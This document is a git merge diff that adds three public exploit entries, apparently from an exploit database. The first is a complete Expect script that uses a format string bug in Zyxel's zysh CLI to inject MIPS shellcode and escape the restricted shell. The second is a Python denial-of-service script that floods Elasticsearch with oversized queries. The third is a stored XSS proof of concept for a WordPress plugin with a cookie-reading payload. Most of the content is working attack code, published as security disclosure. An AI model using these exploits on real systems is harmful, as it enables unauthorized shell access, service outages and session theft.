Merge remote-tracking branch 'upstream/main'

exploits/hardware/remote/51786.txt

@@ -0,0 +1,207 @@
+#!/usr/bin/expect -f
+
+#
+# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
+# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# "We live on a placid island of ignorance in the midst of black seas of
+# infinity, and it was not meant that we should voyage far."
+#                                -- H. P. Lovecraft, The Call of Cthulhu
+#
+# "Multiple improper input validation flaws were identified in some CLI
+# commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71,
+# USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware
+# versions 4.32 through 5.21, VPN series firmware versions 4.30 through
+# 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500
+# firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware
+# version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version
+# 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2)
+# and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and
+# earlier versions, that could allow a local authenticated attacker to
+# cause a buffer overflow or a system crash via a crafted payload."
+#                                -- CVE-2022-26531
+#
+# The zysh binary is a restricted shell that implements the command-line
+# interface (CLI) on multiple Zyxel products. This proof-of-concept exploit
+# demonstrates how to leverage the format string bugs I have identified in
+# the "extension" argument of some zysh commands, to execute arbitrary code
+# and escape the restricted shell environment.
+#
+# - This exploit targets the "ping" zysh command.
+# - It overwrites the .got entry of fork() with the shellcode address.
+# - The shellcode address is calculated based on a leaked stack address.
+# - Hardcoded offsets and values might need some tweaking, see comments.
+# - Automation/weaponization for other targets is left as an exercise.
+#
+# For additional details on my bug hunting journey and on the
+# vulnerabilities themselves, you can refer to the official advisory:
+# https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt
+#
+# Usage:
+# raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password
+# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
+# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# Leaked stack address:  0x7fe97170
+# Shellcode address:     0x7fe9de40
+# Base string length:    46
+# Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn
+#
+# *** enjoy your shell! ***
+#
+# sh-5.1$ uname -snrmp
+# Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0
+# sh-5.1$ id
+# uid=10007(admin) gid=10000(operator) groups=10000(operator)
+#
+# Tested on:
+# Zyxel USG20-VPN with Firmware 5.10
+# [other appliances/versions are also likely vulnerable]
+#
+
+# change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8
+encoding system iso8859-1
+
+# hostile format string to leak stack address via direct parameter access
+set offset1 77
+set leak [format "AAAA.0x%%%d\$x" $offset1]
+
+# offsets to reach addresses in retloc sled via direct parameter access
+set offset2 1801
+set offset3 [expr $offset2 + 1]
+
+# difference between leaked stack address and shellcode address
+set diff 27856
+
+# retloc sled
+# $ mips64-linux-readelf -a zysh | grep JUMP | grep fork
+# 112dd558  0000967f R_MIPS_JUMP_SLOT  00000000   fork@GLIBC_2.0
+# ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2]
+set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024]
+
+# nop sled
+# nop-equivalent instruction: xor $t0, $t0, $t0
+set nops [string repeat "\x01\x8c\x60\x26" 64]
+
+# shellcode
+# https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c
+set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c"
+
+# padding to align payload in memory (might need adjusting)
+set padding "AAA"
+
+# print header
+send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n"
+send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n"
+
+# check command line
+if { [llength $argv] != 3} {
+	send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n"
+	exit 1
+}
+
+# get SSH connection parameters
+set port "22"
+set host [lindex $argv 0]
+set user [lindex $argv 1]
+set pass [lindex $argv 2]
+
+# inject payload via the TERM environment variable
+set env(TERM) $retloc$nops$sc$padding
+
+# connect to target via SSH
+log_user 0
+spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user
+expect {
+	-nocase "password*" {
+		send "$pass\r"
+	}
+	default {
+		send_error "error: could not connect to ssh\n"
+		exit 1
+	}
+}
+
+# leak stack address
+expect {
+	"Router? $" {
+		send "ping 127.0.0.1 extension $leak\r"
+	}
+	default {
+		send_error "error: could not access zysh prompt\n"
+		exit 1
+	}
+}
+expect {
+	-re "ping: unknown host AAAA\.(0x.*)\r\n" {
+	}
+	default {
+		send_error "error: could not leak stack address\n"
+		exit 1
+	}
+}
+set leaked $expect_out(1,string)
+send_user "Leaked stack address:\t$leaked\n"
+
+# calculate shellcode address
+set retval [expr $leaked + $diff]
+set retval [format 0x%x $retval]
+send_user "Shellcode address:\t$retval\n"
+
+# extract each byte of shellcode address
+set b1 [expr ($retval & 0xff000000) >> 24]
+set b2 [expr ($retval & 0x00ff0000) >> 16]
+set b3 [expr ($retval & 0x0000ff00) >> 8]
+set b4 [expr ($retval & 0x000000ff)]
+set b1 [format 0x%x $b1]
+set b2 [format 0x%x $b2]
+set b3 [format 0x%x $b3]
+set b4 [format 0x%x $b4]
+
+# calculate numeric arguments for the hostile format string
+set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3  "]
+send_user "Base string length:\t$base\n"
+set n1 [expr ($b4 - $base) % 0x100]
+set n2 [expr ($b2 - $b4) % 0x100]
+set n3 [expr ($b1 - $b2) % 0x100]
+set n4 [expr ($b3 - $b1) % 0x100]
+
+# check for dangerous numeric arguments below 10
+if {$n1 < 10} { incr n1 0x100 }
+if {$n2 < 10} { incr n2 0x100 }
+if {$n3 < 10} { incr n3 0x100 }
+if {$n4 < 10} { incr n4 0x100 }
+
+# craft the hostile format string
+set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4]
+send_user "Hostile format string:\t$exploit\n\n"
+
+# uncomment to debug
+# interact +
+
+# exploit target
+set prompt "(#|\\\$) $"
+expect {
+	"Router? $" {
+		send "ping 127.0.0.1 extension $exploit\r"
+	}
+	default {
+		send_error "error: could not access zysh prompt\n"
+		exit 1
+	}
+}
+expect {
+	"Router? $" {
+		send_error "error: could not exploit target\n"
+		exit 1
+	}
+	-re $prompt {
+		send_user "*** enjoy your shell! ***\n"
+		send "\r"
+		interact
+	}
+	default {
+		send_error "error: could not exploit target\n"
+		exit 1
+	}
+}

exploits/multiple/dos/51787.txt

@@ -0,0 +1,54 @@
+# Exploit Author: TOUHAMI KASBAOUI
+# Vendor Homepage: https://elastic.co/
+# Version: 8.5.3 / OpenSearch
+# Tested on: Ubuntu 20.04 LTS
+# CVE : CVE-2023-31419
+# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
+
+import requests
+import random
+import string
+
+es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
+index_name = '*'
+
+payload = "/*" * 10000 + "\\" +"'" * 999
+
+verify_ssl = False
+
+username = 'elastic'
+password = 'changeme'
+
+auth = (username, password)
+
+num_queries = 100
+
+for _ in range(num_queries):
+    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
+    search_query = {
+        "query": {
+            "match": {
+                "message": (symbols * 9000) + payload
+            }
+        }
+    }
+
+    print(f"Query {_ + 1} - Search Query:")
+
+    search_endpoint = f'{es_url}/{index_name}/_search'
+    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
+
+    if response.status_code == 200:
+        search_results = response.json()
+
+        print(f"Query {_ + 1} - Response:")
+        print(search_results)
+
+        total_hits = search_results['hits']['total']['value']
+        print(f"Query {_ + 1}: Total hits: {total_hits}")
+
+        for hit in search_results['hits']['hits']:
+            source_data = hit['_source']
+            print("Payload result: {search_results}")
+    else:
+        print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

exploits/php/webapps/51785.txt

@@ -0,0 +1,52 @@
+# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site
+Scripting (XSS) (Authenticated)
+# Date: 11.10.2023
+# Exploit Author: Furkan ÖZER
+# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/
+# Version: 8.0.5
+# Tested on: Kali-Linux,Windows10,Windows 11
+# CVE: N/A
+
+
+# Description:
+Advanced Page Visit Counter is a remarkable Google Analytics alternative
+specifically designed for WordPress websites, and it has quickly become a
+must-have plugin for website owners and administrators seeking powerful
+tracking and analytical capabilities. With the recent addition of Enhanced
+eCommerce Tracking for WooCommerce, this plugin has become even more
+indispensable for online store owners.
+
+Homepage | Support | Premium Version
+
+If you’re in search of a GDPR-friendly website analytics plugin exclusively
+designed for WordPress, look no further than Advanced Page Visit Counter.
+This exceptional plugin offers a compelling alternative to Google Analytics
+and is definitely worth a try for those seeking enhanced data privacy
+compliance.
+
+This is a free plugin and doesn’t require you to create an account on
+another site. All features outlined below are included in the free plugin.
+
+Description of the owner of the plugin Stored Cross-Site Scripting attack
+against the administrators or the other authenticated users.
+
+The plugin does not sanitise and escape some of its settings, which could
+allow high privilege users such as admin to perform Stored Cross-Site
+Scripting attacks even when the unfiltered_html capability is disallowed
+(for example in multisite setup)
+
+The details of the discovery are given below.
+
+# Steps To Reproduce:
+1. Install and activate the Advanced Page Visit Counter plugin.
+2. Visit the "Settings" interface available in settings page of the plugin
+that is named "Widget Settings"
+3. In the plugin's "Today's Count Label" setting field, enter the payload
+Payload: " "type=image src=1 onerror=alert(document.cookie)> "
+6. Click the "Save Changes" button.
+7. The XSS will be triggered on the settings page when every visit of an
+authenticated user.
+
+
+# Video Link
+https://youtu.be/zcfciGZLriM